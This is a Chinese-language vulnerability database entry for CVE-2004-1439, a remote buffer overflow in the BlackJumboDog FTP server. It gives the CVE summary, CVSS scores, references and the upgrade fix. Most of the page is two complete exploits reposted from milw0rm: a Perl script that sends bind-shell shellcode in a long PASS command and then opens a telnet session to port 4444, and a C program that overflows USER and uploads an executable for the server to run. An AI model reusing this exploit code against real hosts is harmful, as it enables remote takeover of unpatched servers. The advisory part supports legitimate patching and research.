CVE-2004-1439
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:22
NMCOE    

[原文]Buffer overflow in BlackJumboDog 3.x allows remote attackers to execute arbitrary code via long FTP commands such as (1) USER, (2) PASS, (3) RETR,(4) CWD, (5) XMKD, and (6) XRMD.


[CNNVD]SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞(CNNVD-200412-654)

        
        SapporoWorks BlackJumboDog是一款开放源代码集成代理服务,WEB和FTP服务的程序。
        SapporoWorks BlackJumboDog包含的FTP服务程序不正确处理多个命令参数数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        发送包含超长字符串作为参数的USER、PASS、RETR、CWD、XMKD、XRMD或其他命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1439
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1439
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-654
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/714584
(VENDOR_ADVISORY)  CERT-VN  VU#714584
http://www.securityfocus.com/bid/10834
(PATCH)  BID  10834
http://xforce.iss.net/xforce/xfdb/16842
(UNKNOWN)  XF  blackjumbodog-long-string-bo(16842)
http://www.security.org.sg/vuln/bjd361.html
(UNKNOWN)  MISC  http://www.security.org.sg/vuln/bjd361.html
http://www.ir3ip.net/pipermail/bugtraq/2004-September/009960.html
(UNKNOWN)  BUGTRAQ  20040910 BlackJumboDog FTP Server version 3.6.1 Buffer Overflow [Exploit included]
http://secunia.com/advisories/12203
(UNKNOWN)  SECUNIA  12203

- 漏洞信息

SapporoWorks BlackJumboDog FTP服务远程缓冲区溢出漏洞
高危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        SapporoWorks BlackJumboDog是一款开放源代码集成代理服务,WEB和FTP服务的程序。
        SapporoWorks BlackJumboDog包含的FTP服务程序不正确处理多个命令参数数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        发送包含超长字符串作为参数的USER、PASS、RETR、CWD、XMKD、XRMD或其他命令,可触发缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        SapporoWorks
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页升级到BlackJumboDog 3.6.2版本:
        
        http://homepage2.nifty.com/spw/software/bjd/index.html

- 漏洞信息 (378)

BlackJumboDog Remote Buffer Overflow Exploit (EDBID:378)
windows remote
2004-08-05 Verified
21 Tal Zeltzer
N/A [点击下载]
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#

use strict;
use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

print "[+] Connected to host\r\n";

$socket->autoflush(1);

#receive banner

my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);

#send USER command

my $username = "anonymous";
print $socket "USER $username\r\n";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec


#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

printf "[+] Sending shellcode\r\n";

my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec


$repcode = "";
recv_reply($socket, $repcode);

close($socket);

system("telnet $host 4444");

exit(0);


sub usage
{
# print usage information
print "\nUsage: jumbo.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port\n\n";
exit(1);
}

sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";

my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}

# milw0rm.com [2004-08-05]
		

- 漏洞信息 (439)

BlackJumboDog FTP Server 3.6.1 Remote Buffer Overflow Exploit (EDBID:439)
windows remote
2004-09-12 Verified
21 Delikon
N/A [点击下载]
/*
6.9.04|www.Delikon.de|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN

C:\Codes\blackjumbodog\Release>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN

Delikon|6.9.04|www.Delikon.de

[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready

[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day


*/

#include <stdio.h>
#include <string.h>
#include <winsock.h>


//opens a port on 7777
//where you can upload a exe 
//after terminating the network connection to port 7777
//the exe gets executed 
//you will find the asm sourcecode at www.delikon.de
//it also exits with ExitThread, so the shellcode don't crashes the service
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x4A\xFE\x80\x30\x88\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\x61\xE0\x89\x88\x88\xD3\xDD\x01\x6D\xEE\x09\x64\xBC\x88\x01\x6E\xEE\x09"
"\x64\x84\x88\x60\x57\x88\x88\x88\x01\x4F\xDF\xE0\x06\xC6\x86\x64\x60\x63\x88\x88"
"\x88\x01\xCD\x80\x05\xDB\xB8\xDA\x77\xDD\x80\x01\xCD\x80\x05\xDB\xB3\x01\xDE\xBC"
"\xE2\x85\xD1\xEE\x09\x71\x8F\x88\xFD\x8B\x03\xF5\x80\x01\x86\xDF\x77\xFC\x03\x74"
"\x60\x37\x88\x88\x88\x03\x86\x01\xCC\x06\x74\x6A\x6A\xEE\x09\x64\x18\x89\xDC\xE0"
"\x89\x89\x88\x88\x77\xDE\x8C\xB9\x77\xDF\xDF\xDF\xDF\xCF\xDF\xCF\xDF\x77\x9E\x01"
"\x4B\xB9\x77\xDF\xDF\xE0\x8A\x88\x96\xE9\x01\x6A\xE2\x98\xDA\xDB\x77\xDE\x80\xDF"
"\xDB\x77\xDE\x84\xDF\xDE\xDB\x77\xDE\x98\x01\x4B\xE2\x88\xE2\x8E\xE2\x8C\xE2\x88"
"\xE2\x8F\xE0\x88\x88\x88\x68\x77\xFE\xBC\x77\xDE\xAC\x01\x4F\x09\x64\x14\x77\x77"
"\x77\x01\x6D\x05\xDD\xEC\xE2\x88\xE0\xEC\x88\x88\x88\xDA\xDB\x77\xDE\x9C\xB5\x77"
"\x77\x77\x77\xFC\x9D\xB5\x88\x88\x88\x88\xFC\x86\x05\xDD\xEC\xE2\x88\xD9\xD8\xDA"
"\xDF\x77\xDE\xA0\x63\x5D\xDB\x77\xDE\x90\xDF\x77\xDE\xA4\xE0\x8D\x88\x88\x88\x77"
"\xFE\xBC\x77\xDE\xA8\xB9\x77\xDF\x77\xDE\x94\xDD\xDE\xEC\x29\xB8\x88\x88\x88\x03"
"\xC8\x84\x03\xF8\x94\x25\x03\xE0\x80\x01\x60\xD6\xD5\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89"
"\x63\x6B\xBD\xC1\x03\xBC\x03\x89\x66\xB9\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49"
"\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84"
"\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89\x60\x61\x8A\x88\x88\x88\xB9\x48\x01\x62"
"\xD7\xD6\xD5\xD3\x4A\x8C\x88\x60\x1B\x76\x77\x77\x51\x81\x7D\x25\x43\x65\x74\xB3"
"\x2C\x92\xF8\x4F\x2C\x25\xA6\x61\x6D\xC1\x0E\xC1\x3E\x91\x90\x6F\x6F\xF1\x4E\xF1"
"\x67\x46\x68\xE8\x10\x76\x02\x86\x2D\x9F\x88\xF4\x97\xF1\x82\x60\x73\x1F\x75\x87"
"\xDF\xDB\xBA\xD7\xBB\xBA\xA6\xCC\xC4\xC4\x88\xDA\xB8\xB8\xFC\xA6\xED\xF0\xED\x88";

int fileupload(int port,char *FileName,char* ip){

FILE* file;


int sockfd, numbytes;

struct hostent *he;
struct sockaddr_in their_addr; 
char buf[1024];
char *a=NULL;
int read=0;


printf("[+] Opening File\n");

file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failed\n");
return 0;
}
printf("[+] File found ready to send\n");

if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return 0;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -
1) {
printf("[-] Connecting error\n");
return 0;
}
printf("[+] Connected\n[+] Sending executable.\n");

while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return 0;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 1;
}



void banner(){
printf("BlackJumboDog FTP Server Buffer Overflow version 3.6.1\nhttp://www.securiteam.com/windowsntfocus/5AP040ADPW.html\nThx
to Chew Keong TAN\n");
printf("\nDelikon|6.9.04|www.Delikon.de\n");
}

void usage(){

printf("\nBJDExploit HOST PORT FileToUpload\n");
}




//#pragma lib <ws2_32.lib>
#pragma comment(lib,"ws2_32.lib")

int main(int argc,char *argv[]) {
int sockfd, numbytes;
//i have some problems with the ret-addresses
//only this one worked
//the SEH don't executes every address
// but i don't know the reason
DWORD RetAddr=0x6BD01395;
/* SYNCOR11.DLL XP sp2 full patched english version
6BD01395 5E POP ESI 
6BD01396 33C0 XOR EAX,EAX
6BD01398 5D POP EBP
6BD01399 C2 0800 RETN 8
*/




struct hostent *he;
struct sockaddr_in their_addr; 

char buf[1024];
int read=0;

WSADATA wsaData; 

if(argc<3){
banner();
usage();
exit(1);
}

banner();

if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{
printf("[-] Connecting error\n");
return -1;
}
printf("\n[+] Connected.\n");
read=sizeof(buf);
numbytes=recv(sockfd,buf,read,0);
buf[numbytes]=0x00;
printf("%s \n",buf); 

memset(buf,0x00,sizeof(buf)); 
Sleep(200); 


strcpy(buf,"USER "); 
memset(buf+strlen(buf),0x41,308); 
memcpy(buf+strlen(buf),"\xeb\x06",2);
memset(buf+strlen(buf),0x41,2);
memcpy(buf+strlen(buf),&RetAddr,4);
strcat(buf,shellcode);
buf[strlen(buf)]='\x0a';



printf("[+]Shellcode length: %i \n",strlen(shellcode));




read =strlen(buf); 
numbytes=send(sockfd,buf,read,0);
printf("[+] Sending the shellcode\n");





Sleep(2000);
printf("[+] Sleeping\n");

if(fileupload(7777,argv[3],argv[1]))
printf("[+] Have a nice day\n");



closesocket(sockfd);
WSACleanup();

return 0;
}


// milw0rm.com [2004-09-12]
		

- 漏洞信息

8273
BlackJumboDog FTP Multiple Command Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

The FTP server fails to properly check the length of parameters in multiple FTP commands, most significant of which is USER, resulting in a stack overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity, and/or availability.

- 时间线

2004-07-29 2004-07-26
2004-07-29 Unknow

- 解决方案

Upgrade to version 3.6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站